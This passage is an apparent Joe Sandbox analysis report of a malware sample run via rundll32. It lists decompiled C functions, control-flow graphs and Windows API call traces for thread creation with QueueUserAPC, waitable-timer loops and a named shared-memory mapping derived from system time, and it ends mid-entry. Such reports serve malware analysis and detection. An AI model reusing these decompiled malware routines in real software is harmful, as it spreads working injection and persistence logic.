                                          • lstrcat.KERNEL32(?,?), ref: 0408192F
                                          • lstrcat.KERNEL32(?,00000000), ref: 04081935
                                            • Part of subcall function 0408A5E9: lstrlen.KERNEL32(?,00000000,0408D330,00000001,0408937A,0408D00C,0408D00C,00000000,00000005,00000000,00000000,?,?,?,0408207E,?), ref: 0408A5F2
                                            • Part of subcall function 0408A5E9: mbstowcs.NTDLL ref: 0408A619
                                            • Part of subcall function 0408A5E9: memset.NTDLL ref: 0408A62B
                                          • wcstombs.NTDLL ref: 040819C8
                                            • Part of subcall function 0408A060: SysAllocString.OLEAUT32(?), ref: 0408A09B
                                            • Part of subcall function 0408A060: IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 0408A11E
                                            • Part of subcall function 0408147E: HeapFree.KERNEL32(00000000,00000000,04081D11,00000000,?,?,-00000008), ref: 0408148A
                                          • HeapFree.KERNEL32(00000000,?,?), ref: 04081A09
                                          • HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 04081A15
                                          • HeapFree.KERNEL32(00000000,?,?,04C895B0), ref: 04081A21
                                          • HeapFree.KERNEL32(00000000,?), ref: 04081A2D
                                          • RtlFreeHeap.NTDLL(00000000,?), ref: 04081A39
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                                          • String ID:
                                          • API String ID: 603507560-0
                                          • Opcode ID: 44d89094b457cf32eb9d1e0ae8be98803e5b503c5ee778c5d593f7aba3b02fe6
                                          • Instruction ID: 618499d5f60ee8509e8bc5a845f03d44f74ba45fe176d532f44b9d0d89424e29
                                          • Opcode Fuzzy Hash: 44d89094b457cf32eb9d1e0ae8be98803e5b503c5ee778c5d593f7aba3b02fe6
                                          • Instruction Fuzzy Hash: BF912971900109EFEB11EFA4DE48A9A7BB9EF08354F144168F488FB260D739ED51DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 005111D4, Relevance: 22.6, APIs: 15, Instructions: 112threadsleepsynchronizationCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 97 5111d4-5111e7 call 51179c 100 511306-511308 97->100 101 5111ed 97->101 102 5111ee-511216 SwitchToThread call 511b6f Sleep 101->102 105 511218-51121a 102->105 106 511220-511224 105->106 107 511305 105->107 108 511226-511231 call 51130b 106->108 109 51127a-51129a CreateThread 106->109 107->100 118 511233-511244 GetLongPathNameW 108->118 119 511274 108->119 111 5112f5-5112f7 GetLastError 109->111 112 51129c-5112b4 QueueUserAPC 109->112 114 5112fa-511301 111->114 115 5112d1-5112d3 112->115 116 5112b6-5112cb GetLastError TerminateThread CloseHandle SetLastError 112->116 114->107 120 511303 GetLastError 114->120 115->111 117 5112d5-5112e3 WaitForSingleObject 115->117 116->115 121 5112f0-5112f3 CloseHandle 117->121 122 5112e5-5112ea GetExitCodeThread 117->122 123 511246-511257 call 511026 118->123 124 51126a-511272 118->124 119->109 120->107 121->114 122->121 123->124 127 511259-511263 GetLongPathNameW call 511938 123->127 124->109 129 511268 127->129 129->109
                                          C-Code - Quality: 85%
                                          			E005111D4(void* __ecx, void* __edx, void* __edi, long _a4) {
				long _v8;
				void* _v32;
				long _t21;
				long _t23;
				long _t25;
				void* _t26;
				long _t29;
				long _t30;
				long _t34;
				void* _t39;
				intOrPtr _t42;
				void* _t47;
				void* _t52;
				signed int _t55;
				void* _t57;
				intOrPtr* _t58;

				_t47 = __ecx;
				_t21 = E0051179C();
				_v8 = _t21;
				if(_t21 != 0) {
					return _t21;
				}
				do {
					_t55 = SwitchToThread() + 8;
					_t23 = E00511B6F(__edi, _t55); // executed
					_v8 = _t23;
					Sleep(0x20 + _t55 * 4); // executed
					_t25 = _v8;
				} while (_t25 == 0xc);
				if(_t25 != 0) {
					L21:
					return _t25;
				}
				_push(__edi);
				if(_a4 != 0) {
					L11:
					_t26 = CreateThread(0, 0, __imp__SleepEx,  *0x514140, 0, 0); // executed
					_t57 = _t26;
					if(_t57 == 0) {
						L18:
						_v8 = GetLastError();
						L19:
						_t25 = _v8;
						if(_t25 == 0xffffffff) {
							_t25 = GetLastError();
						}
						goto L21;
					}
					_t29 = QueueUserAPC(E005116E4, _t57,  &_v32); // executed
					if(_t29 == 0) {
						_t34 = GetLastError();
						_a4 = _t34;
						TerminateThread(_t57, _t34);
						CloseHandle(_t57);
						_t57 = 0;
						SetLastError(_a4);
					}
					if(_t57 == 0) {
						goto L18;
					} else {
						_t30 = WaitForSingleObject(_t57, 0xffffffff);
						_v8 = _t30;
						if(_t30 == 0) {
							GetExitCodeThread(_t57,  &_v8);
						}
						CloseHandle(_t57);
						goto L19;
					}
				}
				if(E0051130B(_t47,  &_a4) != 0) {
					 *0x514138 = 0;
					goto L11;
				}
				_t58 = __imp__GetLongPathNameW;
				_t39 =  *_t58(_a4, 0, 0); // executed
				_t52 = _t39;
				if(_t52 == 0) {
					L9:
					 *0x514138 = _a4;
					goto L11;
				}
				_t10 = _t52 + 2; // 0x2
				_t42 = E00511026(_t52 + _t10);
				 *0x514138 = _t42;
				if(_t42 == 0) {
					goto L9;
				}
				 *_t58(_a4, _t42, _t52); // executed
				E00511938(_a4);
				goto L11;
			}



















                                          0x005111d4
                                          0x005111db
                                          0x005111e2
                                          0x005111e7
                                          0x00511308
                                          0x00511308
                                          0x005111ee
                                          0x005111f6
                                          0x005111fa
                                          0x005111ff
                                          0x0051120a
                                          0x00511210
                                          0x00511213
                                          0x0051121a
                                          0x00511305
                                          0x00000000
                                          0x00511305
                                          0x00511220
                                          0x00511224
                                          0x0051127a
                                          0x0051128a
                                          0x00511290
                                          0x0051129a
                                          0x005112f5
                                          0x005112f7
                                          0x005112fa
                                          0x005112fa
                                          0x00511301
                                          0x00511303
                                          0x00511303
                                          0x00000000
                                          0x00511301
                                          0x005112a6
                                          0x005112b4
                                          0x005112b6
                                          0x005112ba
                                          0x005112bd
                                          0x005112c4
                                          0x005112c9
                                          0x005112cb
                                          0x005112cb
                                          0x005112d3
                                          0x00000000
                                          0x005112d5
                                          0x005112d8
                                          0x005112de
                                          0x005112e3
                                          0x005112ea
                                          0x005112ea
                                          0x005112f1
                                          0x00000000
                                          0x005112f1
                                          0x005112d3
                                          0x00511231
                                          0x00511274
                                          0x00000000
                                          0x00511274
                                          0x00511233
                                          0x0051123e
                                          0x00511240
                                          0x00511244
                                          0x0051126a
                                          0x0051126d
                                          0x00000000
                                          0x0051126d
                                          0x00511246
                                          0x0051124b
                                          0x00511250
                                          0x00511257
                                          0x00000000
                                          0x00000000
                                          0x0051125e
                                          0x00511263
                                          0x00000000

                                          APIs
                                            • Part of subcall function 0051179C: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,005111E0), ref: 005117AB
                                            • Part of subcall function 0051179C: GetVersion.KERNEL32(?,005111E0), ref: 005117BA
                                            • Part of subcall function 0051179C: GetCurrentProcessId.KERNEL32(?,005111E0), ref: 005117D6
                                            • Part of subcall function 0051179C: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,005111E0), ref: 005117EF
                                          • SwitchToThread.KERNEL32 ref: 005111EE
                                            • Part of subcall function 00511B6F: VirtualAlloc.KERNELBASE(00000000,-00000008,00003000,00000004,00000000,?,-00000008,-00000008), ref: 00511BC5
                                            • Part of subcall function 00511B6F: memcpy.NTDLL(?,?,-00000008,?,?,?,?,?,?,?,?,005111FF,-00000008), ref: 00511C57
                                            • Part of subcall function 00511B6F: VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00511C72
                                          • Sleep.KERNELBASE(00000000,-00000008), ref: 0051120A
                                          • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 0051123E
                                          • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 0051125E
                                          • CreateThread.KERNEL32 ref: 0051128A
                                          • QueueUserAPC.KERNELBASE(005116E4,00000000,?), ref: 005112A6
                                          • GetLastError.KERNEL32 ref: 005112B6
                                          • TerminateThread.KERNEL32(00000000,00000000), ref: 005112BD
                                          • CloseHandle.KERNEL32(00000000), ref: 005112C4
                                          • SetLastError.KERNEL32(?), ref: 005112CB
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 005112D8
                                          • GetExitCodeThread.KERNEL32(00000000,?), ref: 005112EA
                                          • CloseHandle.KERNEL32(00000000), ref: 005112F1
                                          • GetLastError.KERNEL32 ref: 005112F5
                                          • GetLastError.KERNEL32 ref: 00511303
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.519984285.0000000000510000.00000040.00020000.sdmp, Offset: 00510000, based on PE: true
                                          • Associated: 00000003.00000002.520021695.0000000000515000.00000040.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.520067609.0000000000517000.00000040.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_510000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorLastThread$CloseCreateHandleLongNamePathProcessVirtual$AllocCodeCurrentEventExitFreeObjectOpenQueueSingleSleepSwitchTerminateUserVersionWaitmemcpy
                                          • String ID:
                                          • API String ID: 3896949738-0
                                          • Opcode ID: a6ffb12e47ae28684f50c5107542732241bc3a072f6ed96a1f35ac60bd964b1c
                                          • Instruction ID: 937effe6d7642bacd05ccd0f8d9edd3e6afbfc646c5531a99c3656e46018383b
                                          • Opcode Fuzzy Hash: a6ffb12e47ae28684f50c5107542732241bc3a072f6ed96a1f35ac60bd964b1c
                                          • Instruction Fuzzy Hash: 19318175800519BFEB10AFB5DC888EE7EE8FB283907108565FA11D3110D7348E85EBA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04089B6F, Relevance: 16.7, APIs: 11, Instructions: 152timememoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 130 4089b6f-4089ba1 memset CreateWaitableTimerA 131 4089d23-4089d29 GetLastError 130->131 132 4089ba7-4089c00 _allmul SetWaitableTimer WaitForMultipleObjects 130->132 133 4089d2d-4089d37 131->133 134 4089c8b-4089c91 132->134 135 4089c06-4089c09 132->135 136 4089c92-4089c96 134->136 137 4089c0b call 40868cf 135->137 138 4089c14 135->138 139 4089c98-4089ca0 HeapFree 136->139 140 4089ca6-4089caa 136->140 143 4089c10-4089c12 137->143 142 4089c1e 138->142 139->140 140->136 144 4089cac-4089cb6 CloseHandle 140->144 145 4089c22-4089c27 142->145 143->138 143->142 144->133 146 4089c29-4089c30 145->146 147 4089c3a-4089c68 call 4089f11 145->147 146->147 148 4089c32 146->148 151 4089cb8-4089cbd 147->151 152 4089c6a-4089c75 147->152 148->147 153 4089cdc-4089ce4 151->153 154 4089cbf-4089cc5 151->154 152->145 155 4089c77-4089c87 call 40854ac 152->155 158 4089cea-4089d18 _allmul SetWaitableTimer WaitForMultipleObjects 153->158 154->134 157 4089cc7-4089cda call 4086106 154->157 155->134 157->158 158->145 161 4089d1e 158->161 161->134
                                          C-Code - Quality: 83%
                                          			E04089B6F(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void _v48;
				long _v52;
				struct %anon52 _v60;
				char _v72;
				long _v76;
				void* _v80;
				union _LARGE_INTEGER _v84;
				struct %anon52 _v92;
				void* _v96;
				void* _v100;
				union _LARGE_INTEGER _v104;
				long _v108;
				intOrPtr _v120;
				struct %anon52 _v128;
				struct %anon52 _t46;
				void* _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				struct %anon52 _t65;
				void* _t68;
				void* _t72;
				signed int _t73;
				void* _t75;
				void* _t78;
				void** _t82;
				signed int _t86;
				void* _t89;

				_t75 = __edx;
				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v60 = _t46;
				if(_t46 == 0) {
					_v92.HighPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x408d240);
					_v76 = 0;
					_v80 = 0;
					L0408B088();
					_v84.LowPart = _t46;
					_v80 = _t75;
					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
					_t51 =  *0x408d26c; // 0x3bc
					_v76 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
					_v108 = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x408d24c = 5;
						} else {
							_t68 = E040868CF(); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v104.LowPart = 0;
						L6:
						L6:
						if(_v104.LowPart == 1 && ( *0x408d260 & 0x00000001) == 0) {
							_v104.LowPart = 2;
						}
						_t73 = _v104.LowPart;
						_t58 = _t73 << 4;
						_t78 = _t89 + (_t73 << 4) + 0x3c;
						_t74 = _t73 + 1;
						_v92.LowPart = _t73 + 1;
						_t60 = E04089F11(_t74, _t78, _t74, _t89 + _t58 + 0x3c, _t78,  &_v96,  &_v100); // executed
						_v128.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v92;
						_v104.LowPart = _t65;
						_t97 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v120 = E040854AC(_t74, _t97,  &_v72, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x408d244);
							goto L21;
						} else {
							__eflags =  *0x408d248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E04086106();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x408d248);
								L21:
								L0408B088();
								_v104.LowPart = _t60;
								_v100 = _t78;
								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
								_v128 = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t82 =  &_v72;
					_t72 = 3;
					do {
						_t54 =  *_t82;
						if(_t54 != 0) {
							HeapFree( *0x408d238, 0, _t54);
						}
						_t82 =  &(_t82[4]);
						_t72 = _t72 - 1;
					} while (_t72 != 0);
					CloseHandle(_v80);
				}
				return _v92.HighPart;
				goto L25;
			}
































                                          0x04089b6f
                                          0x04089b85
                                          0x04089b89
                                          0x04089b8e
                                          0x04089b95
                                          0x04089b9b
                                          0x04089ba1
                                          0x04089d29
                                          0x04089ba7
                                          0x04089ba7
                                          0x04089ba9
                                          0x04089bae
                                          0x04089baf
                                          0x04089bb5
                                          0x04089bb9
                                          0x04089bbd
                                          0x04089bcb
                                          0x04089bd9
                                          0x04089bdd
                                          0x04089bdf
                                          0x04089bec
                                          0x04089bf8
                                          0x04089bfa
                                          0x04089c00
                                          0x04089c09
                                          0x04089c14
                                          0x04089c14
                                          0x04089c0b
                                          0x04089c0b
                                          0x04089c12
                                          0x00000000
                                          0x00000000
                                          0x04089c12
                                          0x04089c1e
                                          0x00000000
                                          0x04089c22
                                          0x04089c27
                                          0x04089c32
                                          0x04089c32
                                          0x04089c3a
                                          0x04089c45
                                          0x04089c4d
                                          0x04089c56
                                          0x04089c59
                                          0x04089c5d
                                          0x04089c62
                                          0x04089c68
                                          0x00000000
                                          0x00000000
                                          0x04089c6a
                                          0x04089c6e
                                          0x04089c72
                                          0x04089c75
                                          0x00000000
                                          0x04089c77
                                          0x04089c87
                                          0x04089c87
                                          0x00000000
                                          0x04089cb8
                                          0x04089cb8
                                          0x04089cbd
                                          0x04089cdc
                                          0x04089cde
                                          0x04089ce3
                                          0x04089ce4
                                          0x00000000
                                          0x04089cbf
                                          0x04089cbf
                                          0x04089cc5
                                          0x00000000
                                          0x04089cc7
                                          0x04089cc7
                                          0x04089ccc
                                          0x04089cce
                                          0x04089cd3
                                          0x04089cd4
                                          0x04089cea
                                          0x04089cea
                                          0x04089cf2
                                          0x04089d00
                                          0x04089d04
                                          0x04089d10
                                          0x04089d12
                                          0x04089d16
                                          0x04089d18
                                          0x00000000
                                          0x04089d1e
                                          0x00000000
                                          0x04089d1e
                                          0x04089d18
                                          0x04089cc5
                                          0x00000000
                                          0x04089cbd
                                          0x04089c8b
                                          0x04089c8d
                                          0x04089c91
                                          0x04089c92
                                          0x04089c92
                                          0x04089c96
                                          0x04089ca0
                                          0x04089ca0
                                          0x04089ca6
                                          0x04089ca9
                                          0x04089ca9
                                          0x04089cb0
                                          0x04089cb0
                                          0x04089d37
                                          0x00000000

                                          APIs
                                          • memset.NTDLL ref: 04089B89
                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04089B95
                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04089BBD
                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 04089BDD
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,04084AC4,?), ref: 04089BF8
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,04084AC4,?,00000000), ref: 04089CA0
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,04084AC4,?,00000000,?,?), ref: 04089CB0
                                          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 04089CEA
                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?,?), ref: 04089D04
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04089D10
                                            • Part of subcall function 040868CF: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04C89388,00000000,?,7519F710,00000000,7519F730), ref: 0408691E
                                            • Part of subcall function 040868CF: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04C893C0,?,00000000,30314549,00000014,004F0053,04C8937C), ref: 040869BB
                                            • Part of subcall function 040868CF: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04089C10), ref: 040869CD
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,04084AC4,?,00000000,?,?), ref: 04089D23
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                          • String ID:
                                          • API String ID: 3521023985-0
                                          • Opcode ID: eadad40549fe4900ff8fdc370c694ca8502e082cc15e2a600f3779122e948a09
                                          • Instruction ID: c0e715ad8675bb5f7e613dcce0c82090f79f79699ef5ecb0ec1acdd262a4b170
                                          • Opcode Fuzzy Hash: eadad40549fe4900ff8fdc370c694ca8502e082cc15e2a600f3779122e948a09
                                          • Instruction Fuzzy Hash: FF518DB1018314AFD750BF159E44DABBBE8EF95764F008A2DF8E4A2190D775E904CFA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 005110FC, Relevance: 13.6, APIs: 9, Instructions: 81filetimeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 163 5110fc-511153 GetSystemTimeAsFileTime _aulldiv _snwprintf 164 511155 163->164 165 51115a-511173 CreateFileMappingW 163->165 164->165 166 511175-51117e 165->166 167 5111bd-5111c3 GetLastError 165->167 169 511180-511187 GetLastError 166->169 170 51118e-51119c MapViewOfFile 166->170 168 5111c5-5111cb 167->168 169->170 171 511189-51118c 169->171 172 5111ac-5111b2 GetLastError 170->172 173 51119e-5111aa 170->173 174 5111b4-5111bb CloseHandle 171->174 172->168 172->174 173->168 174->168
                                          C-Code - Quality: 69%
                                          			E005110FC(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L00512180();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x514144;
				_push(_t15 + 0x51505e);
				_push(_t15 + 0x515054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L0051217A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x514148, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}














                                          0x005110fc
                                          0x00511105
                                          0x00511109
                                          0x0051110f
                                          0x00511114
                                          0x00511119
                                          0x0051111c
                                          0x0051111f
                                          0x00511124
                                          0x00511125
                                          0x00511128
                                          0x00511133
                                          0x0051113a
                                          0x0051113e
                                          0x00511140
                                          0x00511141
                                          0x00511144
                                          0x00511149
                                          0x00511153
                                          0x00511155
                                          0x00511155
                                          0x00511169
                                          0x0051116f
                                          0x00511173
                                          0x005111c3
                                          0x00511175
                                          0x0051117e
                                          0x00511194
                                          0x0051119c
                                          0x005111ae
                                          0x005111b2
                                          0x00000000
                                          0x00000000
                                          0x0051119e
                                          0x005111a1
                                          0x005111a6
                                          0x005111a8
                                          0x005111a8
                                          0x00511189
                                          0x0051118b
                                          0x005111b4
                                          0x005111b5
                                          0x005111b5
                                          0x0051117e
                                          0x005111cb

                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00511109
                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 0051111F
                                          • _snwprintf.NTDLL ref: 00511144
                                          • CreateFileMappingW.KERNELBASE(000000FF,00514148,00000004,00000000,?,?), ref: 00511169
                                          • GetLastError.KERNEL32 ref: 00511180
                                          • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00511194
                                          • GetLastError.KERNEL32 ref: 005111AC
                                          • CloseHandle.KERNEL32(00000000), ref: 005111B5
                                          • GetLastError.KERNEL32 ref: 005111BD
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.519984285.0000000000510000.00000040.00020000.sdmp, Offset: 00510000, based on PE: true
                                          • Associated: 00000003.00000002.520021695.0000000000515000.00000040.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.520067609.0000000000517000.00000040.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_510000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                          • String ID:
                                          • API String ID: 1724014008-0
                                          • Opcode ID: 92a6df73caffb72c2713b7569e777e9f8537e17f06a147928543c33355907c0f
                                          • Instruction ID: 8f71f3a580df713a3652140d9dad90bcfbd85fd15ab4aed14737e070e40b0a40
                                          • Opcode Fuzzy Hash: 92a6df73caffb72c2713b7569e777e9f8537e17f06a147928543c33355907c0f
                                          • Instruction Fuzzy Hash: FC21A4B2680508BFE710AF94DC88EDD7BA8FB98350F118165F715D7150D6305E85DB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04081A4E, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 74%
                                          			E04081A4E(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L0408B082();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x408d2a4; // 0xbfa5a8
				_t5 = _t13 + 0x408e836; // 0x4c88dde
				_t6 = _t13 + 0x408e59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L0408AD1A();
				_t17 = CreateFileMappingW(0xffffffff, 0x408d2a8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                          0x04081a4e
                                          0x04081a56
                                          0x04081a5a
                                          0x04081a60
                                          0x04081a65
                                          0x04081a6a
                                          0x04081a6d
                                          0x04081a70
                                          0x04081a75
                                          0x04081a76
                                          0x04081a79
                                          0x04081a7e
                                          0x04081a85
                                          0x04081a8f
                                          0x04081a91
                                          0x04081a92
                                          0x04081a95
                                          0x04081ab1
                                          0x04081ab7
                                          0x04081abb
                                          0x04081b09
                                          0x04081abd
                                          0x04081aca
                                          0x04081ada
                                          0x04081ae2
                                          0x04081af4
                                          0x04081af8
                                          0x00000000
                                          0x00000000
                                          0x04081ae4
                                          0x04081ae7
                                          0x04081aec
                                          0x04081aee
                                          0x04081aee
                                          0x04081acc
                                          0x04081ace
                                          0x04081afa
                                          0x04081afb
                                          0x04081afb
                                          0x04081aca
                                          0x04081b10

                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,04084996,?,?,4D283A53,?,?), ref: 04081A5A
                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04081A70
                                          • _snwprintf.NTDLL ref: 04081A95
                                          • CreateFileMappingW.KERNELBASE(000000FF,0408D2A8,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 04081AB1
                                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,04084996,?,?,4D283A53,?), ref: 04081AC3
                                          • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 04081ADA
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,04084996,?,?,4D283A53), ref: 04081AFB
                                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,04084996,?,?,4D283A53,?), ref: 04081B03
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                          • String ID:
                                          • API String ID: 1814172918-0
                                          • Opcode ID: 554a63343d8930f96b0bd613da3970681308da165e3a8f01551c6c9bdec4e84a
                                          • Instruction ID: 3c72f20ee6ef52a7035a9468fffdc82328d4b7a16e9e0d7bbfebc61ea20536a6
                                          • Opcode Fuzzy Hash: 554a63343d8930f96b0bd613da3970681308da165e3a8f01551c6c9bdec4e84a
                                          • Instruction Fuzzy Hash: 67219F76600204BBE721EF68DE45F8E77B9EF84751F144129F685FA180EA78E9068F60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 040893D5, Relevance: 12.1, APIs: 8, Instructions: 103memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
